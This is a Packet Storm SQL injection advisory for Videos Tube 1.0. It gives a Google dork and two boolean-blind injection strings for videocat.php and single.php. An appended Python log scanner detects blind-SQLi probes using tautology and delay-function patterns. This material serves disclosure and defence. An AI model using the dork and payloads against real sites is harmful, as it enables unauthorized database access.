Videos Tube 1.0 SQL Injection

2014-05-30T00:00:00
ID PACKETSTORM:126866
Type packetstorm
Reporter Mustafa ALTINKAYNAK
Modified 2014-05-30T00:00:00

Description

                                        
# Exploit Title: Videos Tube SQL Injection and Remote Code Execution
# Google Dork: inurl:"single.php?url=" video
# Date: 05.05.2014
# Exploit Author: Mustafa ALTINKAYNAK
# Vendor Homepage: http://www.phpscriptlerim.com
# Software Link: http://demo.phpscriptlerim.com/free/videostube/
# Version: 1.0

Description
========================
The category page and the video display page are both affected by two types of SQL injection: boolean-based blind and AND/OR time-based blind. The vulnerabilities can be closed off by filtering the incoming data.

Vulnerability
========================
1) videocat.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMap Tool)
2) single.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMap Tool)

--
Mustafa ALTINKAYNAK
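For defenders running this script, the probes above leave a recognizable trace in web server logs. The following is an added example, not part of the original advisory: it scans access-log lines for boolean-based and time-based blind SQL injection patterns in the url parameter of the two affected pages. The log lines, regular expressions, delay-function list and function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Pages and parameter named in the advisory.
AFFECTED_PAGES = {"videocat.php", "single.php"}
PARAM = "url"

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# AND/OR followed by a self-equal comparison, e.g. 3383=3383 or 'ODau'='ODau
TAUTOLOGY = re.compile(r"\b(?:AND|OR)\s+(?:(\d+)\s*=\s*\1\b|'([^']*)'\s*=\s*'\2)", re.I)
# Delay primitives typical of time-based blind probes (assumed list, not from the page).
DELAY = re.compile(r"\b(?:SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.I)

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/May/2014:10:00:01 +0000] "GET /single.php?url=funny-cat-video HTTP/1.1" 200 5120',
    '198.51.100.7 - - [30/May/2014:10:00:05 +0000] "GET /videocat.php?url=test%27%20AND%203383%3D3383%20AND%20%27ODau%27%3D%27ODau HTTP/1.1" 200 5120',
    '198.51.100.7 - - [30/May/2014:10:00:09 +0000] "GET /single.php?url=test%27%20AND%20SLEEP(5)%20AND%20%27a%27%3D%27a HTTP/1.1" 200 5120',
    '192.0.2.10 - - [30/May/2014:10:00:12 +0000] "GET /index.php?url=x%27%20AND%201%3D1 HTTP/1.1" 200 900',
]

def classify(value):
    """Return the blind-SQLi indicators found in one decoded parameter value."""
    hits = []
    if TAUTOLOGY.search(value):
        hits.append("boolean-blind")
    if DELAY.search(value):
        hits.append("time-blind")
    return hits

def scan(lines):
    """Return (line number, page, indicators) for suspicious requests to affected pages."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        parts = urlsplit(match.group(1))
        page = parts.path.rsplit("/", 1)[-1].lower()
        if page not in AFFECTED_PAGES:
            continue
        # parse_qs percent-decodes the value, so encoded quotes and spaces are seen in clear.
        for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
            hits = classify(value)
            if hits:
                findings.append((number, page, hits))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Matches are indicators for triage, not proof of compromise; the actual fix is on the server side, where the url value must be bound as a query parameter or filtered before it reaches the SQL statement.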